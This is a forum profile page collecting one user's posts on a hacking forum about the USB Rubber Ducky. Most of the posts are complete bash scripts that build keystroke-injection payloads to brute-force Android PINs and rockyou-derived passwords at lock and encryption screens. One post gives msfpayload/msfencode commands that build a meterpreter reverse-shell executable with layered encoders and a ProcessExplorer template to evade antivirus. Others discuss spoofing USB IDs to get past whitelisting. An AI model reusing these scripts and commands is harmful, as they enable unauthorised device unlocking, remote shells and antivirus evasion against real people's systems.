Jump to content

CaptainHooligan

Active Members
  • Posts

    12
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by CaptainHooligan

  1. Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.

    #!/bin/bash
    #
    # Payload-Generator version 1.0
    # This tool is licensed under the GPLv3. Currently maintained by
    # James Luther (CaptainHooligan)
    #
    # This tool is used to generate payloads for the USB Rubber Ducky
    #
    # ========================================================================
    # Main Menu
    # ========================================================================
    
    main ()
    {
    dialog --backtitle "Ducky Payload Generator" --title "Main Menu" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Password "Brute Force Password" Pin "Brute Force Pin" About  "Display About" Exit "Quit " 2>/tmp/menuitem.$$
    
    menuitem=`cat /tmp/menuitem.$$`
    
    opt=$?
    
    case $menuitem in
    Pin) Pin;;
    Password) Password;;
    About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintainted by CaptainHooligan" 15 70 && clear && main;;
    Exit) clear;;
    *) clear;;
    esac
    return
    }
    # ==========================================================================
    # This is where the Encryption Brute Forcer is Generated
    # ==========================================================================
    Pin ()
    {
    dialog --backtitle "Ducky Payload Generator" --title "Pin Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Pin at Encryption Screen" Lock "Pin at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$
    
    menuitem=`cat /tmp/menuitem.$$`
    
    opt=$?
    
    case $menuitem in
    Encryption) clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android_brute-force_encryption.txt && java -jar duckencode.jar -i android_brute-force_encryption.txt && mv inject.bin android_brute-force_encryption.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_encryption.*;; 
    Lock) clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_lock.txt && java -jar duckencode.jar -i android_brute-force_lock.txt && mv inject.bin android_brute-force_lock.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_lock.*;;
    Main) clear && main;;
    *) clear ;;
    esac
    return
    }
    # =========================================================================
    # This is where the Password Brute Forcer Menu is processed.
    # =========================================================================
    Password ()
    {
    dialog --backtitle "Ducky Payload Generator" --title "Password Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Password at Encryption Screen" Lock "Password at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$
    
    menuitem=`cat /tmp/menuitem.$$`
    
    opt=$?
    case $menuitem in
    Encryption) clear && Pword_Enc ;;
    Lock) clear && Pword_Lck ;;
    Main) clear && main ;;
    *) clear ;;
    esac
    return
    }
    # ==========================================================================
    # Password Encryption Screen Brute Forcer
    # ==========================================================================
    Pword_Enc ()
    {
    echo "Generating Encryption Screen Password Brute Forcer ..."
    echo " "
    echo DELAY 5000 > android-pword-encryption.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android-pword-encryption.txt
    java -jar duckencode.jar -i android-pword-encryption.txt
    mv inject.bin android-pword-encryption.bin
    clear && ls -lart android-pword-encryption.*
    return
    }
    # ==========================================================================
    # Password Lock Screen Brute Forcer
    # ==========================================================================
    Pword_Lck ()
    {
    echo "Generating Lock Screen Password Brute Forcer ..."
    echo " "
    echo DELAY 5000 > android-pword-lock.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android-pword-lock.txt
    java -jar duckencode.jar -i android-pword-lock.txt
    mv inject.bin android-pword-lock.bin
    clear && ls -lart android-pword-lock.*
    return
    }
    # =====================================================================
    # Prerequisite Checker
    # =====================================================================
    pre ()
    {
    echo -e "Verifying prerequisites are installed ... "
    echo ""
    duckdir=`find / -name duckencode.jar`
    if [ -z "$duckdir" ] ; then
            echo "Duckencode.jar not found on system. Please verify you have this installed."
            exit 1
            else
            echo "Duckencode.jar prerequisite met."
    fi
    duckinpath=`which duckencode.jar`
    if [ -z "$duckinpath" ] ; then
            PATH=$PATH:$duckdir
    fi
    bundir=`find / -name bzip2`
    if [ -z "$bundir" ] ; then
            echo "Bzip2 not found on system. Please verify you have this installed."
            exit 1
            else
            echo "Bzip2 prerequisite met."
    fi
    buninpath=`which bzip2`
    if [ -z "$buninpath" ] ; then
            PATH=$PATH:$bundir
    fi
    wgetdir=`find / -name wget`
    if [ -z "$wgetdir" ] ; then
            echo "Wget not found on system. Please verify you have this installed."
            exit 1
            else
            echo "Wget prerequisite met."
    fi
    wgetinpath=`which wget`
    if [ -z "$wgetinpath" ] ; then
            PATH=$PATH:$wgetdir
    fi
    echo ""
    echo ""
    echo -e "Verify connection to internet and press [Enter]."
    read
    echo ""
    echo ""
    echo -e "Downloading rockyou password list. This can take some time ..."
    echo ""
    echo ""
    wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
    bunzip2 rockyou.txt.bz2
    echo ""
    echo 1 > $HOME/.payloadgenerator
    echo "All Prerequisites met. To continue press [Enter]."
    read
    main
    return
    }
    # ==========================================================================
    # Actual program running
    # ==========================================================================
    clear
    echo " "
    WHOAMI=`id | sed -e 's/(.*//'`
    if [ "$WHOAMI" != "uid=0" ] ; then
            echo "Sorry, you need super user access to run this script."
            exit 1
    fi
    echo " "
    echo "Checking to see if you've met prerequisites before ..."
    echo " "
    if [ -f /root/.payloadgenerator ]
    	then 
    		check=`cat $HOME/.payloadgenerator`
    		case $check in
    		1) main;;
    		0) pre;;
    		*) pre;;
    		esac
    	else
    		pre
    fi
    
  2. Not with version 2 firmware (normally whitelist is based off VID & PID), assuming you have a laptop you can re-write vidpid.bin to support the VID&PID of known device (obtainable from device manager on Win_X or lsusb (usbutils package)(or at least dev) on Unix).

    Bypass AV/HBSS for the win!

    Good call! As always the more research you do on a target the better prepared you can be.

  3. That was pretty much the point I was trying to make, there is always a way to get around what security implementations you run into. The duck does appear as a HID which means what user limits we run into are what we have to deal with. If the security implementation has application white listing the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators.

    Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.

  4. It doesn't really matter what the limitations are set to users. There will always be some way to bypass security in one way or another. For example: robust firewall solution combined with application white listing, limited permissions and USB mass storage disabled means you aren't going to be able to download a file nor will you be able to bring one in.

  5. This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc.

    Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here:

    https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing

  6. Another good thing to do would be to download the rockyou password list
    from skullsecurity. Take like the top 5000 out of it as it is already
    sorted by most frequently used to least. If a device is encrypted this
    will save you tons of time as there is no 5 password then wait limiter.

    Here
    is a script that will grab rockyou.txt and create a payload for you in
    linux. Right now it does wait 30 seconds after every 5 passwords. I'm
    adding an option to not wait 30 seconds as if attacking the encryption
    logon screen.

    #!/bin/bash
    clear
    echo -e "========================================================"
    echo -e " This script downloads the rockyou password list"
    echo -e " then takes the top 5000 passwords and generates"
    echo -e " an Android brute forcer."
    echo -e "========================================================"
    echo -e " You need to have duckencode.jar installed as well"
    echo -e " as bzip2 and wget."
    echo -e "========================================================"
    echo -e " This script is licensed under the GPLv3 and is"
    echo -e " currently maintained by James Luther (CaptainHooligan)"
    echo -e "========================================================"
    echo ""
    echo ""
    WHOAMI=`id | sed -e 's/(.*//'`
    if [ "$WHOAMI" != "uid=0" ] ; then
         echo "Sorry, you need super user access to run this script."
         exit 1
    fi
    echo -e "Verifying prerequisites are installed ... "
    echo ""
    duckdir=`find / -name duckencode.jar`
    if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Duckencode.jar prerequisite met."
    fi
    duckinpath=`which duckencode.jar`
    if [ -z "$duckinpath" ] ; then
    PATH=$PATH:$duckdir
    fi
    bundir=`find / -name bzip2`
    if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Bzip2 prerequisite met."
    fi
    buninpath=`which bzip2`
    if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
    fi
    wgetdir=`find / -name wget`
    if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Wget prerequisite met."
    fi
    wgetinpath=`which wget`
    if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
    fi
    echo ""
    echo ""
    #echo -e "Which do you want to attack?"
    #echo -e " 1. Encryption Screen"
    #echo -e " 2. Password Screen"
    #read answer
    #case answer
    # 1)
    echo -e "Verify connection to internet and press [Enter]."
    read
    echo ""
    echo ""
    echo -e "Downloading rockyou password list. This can take some time ..."
    echo ""
    echo ""
    wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
    bunzip rockyou.txt.bz2
    echo ""
    echo ""
    echo -e "Creating rock-android.txt file ... "
    echo ""
    echo ""
    echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
    echo -e "rock-android.txt created!"
    ls -lart rock-android.txt
    echo ""
    echo ""
    echo -e "Creating inject.bin file ... "
    java -jar duckencode.jar -i rock-android.txt
    echo ""
    echo ""
    echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
    ls -lart inject.bin
    
  7. I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:


    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe
    [/CODE]

    That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:

    [CODE]
    wget http://download.sysinternals.com/Files/ProcessExplorer.zip
    unzip ProcessExplorer.zip
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5
    [/CODE]

    As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.

  8. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.

    ** Edit **

    Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.


    #!/bin/bash
    clear
    echo -e "========================================================"
    echo -e " This script downloads the rockyou password list"
    echo -e " then takes the top 5000 passwords and generates"
    echo -e " an Android brute forcer."
    echo -e "========================================================"
    echo -e " You need to have duckencode.jar installed as well"
    echo -e " as bzip2 and wget."
    echo -e "========================================================"
    echo -e " This script is licensed under the GPLv3 and is"
    echo -e " currently maintained by James Luther (CaptainHooligan)"
    echo -e "========================================================"
    echo ""
    echo ""
    WHOAMI=`id | sed -e 's/(.*//'`
    if [ "$WHOAMI" != "uid=0" ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
    fi
    echo -e "Verifying prerequisites are installed ... "
    echo ""
    duckdir=`find / -name duckencode.jar`
    if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Duckencode.jar prerequisite met."
    fi
    duckinpath=`which duckencode.jar`
    if [ -z "$duckinpath" ] ; then
    PATH=$PATH:$duckdir
    fi
    bundir=`find / -name bzip2`
    if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Bzip2 prerequisite met."
    fi
    buninpath=`which bzip2`
    if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
    fi
    wgetdir=`find / -name wget`
    if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Wget prerequisite met."
    fi
    wgetinpath=`which wget`
    if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
    fi
    echo ""
    echo ""
    #echo -e "Which do you want to attack?"
    #echo -e " 1. Encryption Screen"
    #echo -e " 2. Password Screen"
    #read answer
    #case answer
    # 1)
    echo -e "Verify connection to internet and press [Enter]."
    read
    echo ""
    echo ""
    echo -e "Downloading rockyou password list. This can take some time ..."
    echo ""
    echo ""
    wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
    bunzip rockyou.txt.bz2
    echo ""
    echo ""
    echo -e "Creating rock-android.txt file ... "
    echo ""
    echo ""
    echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
    echo -e "rock-android.txt created!"
    ls -lart rock-android.txt
    echo ""
    echo ""
    echo -e "Creating inject.bin file ... "
    java -jar duckencode.jar -i rock-android.txt
    echo ""
    echo ""
    echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
    ls -lart inject.bin
    [/CODE]

    • Upvote 1
×
×
  • Create New...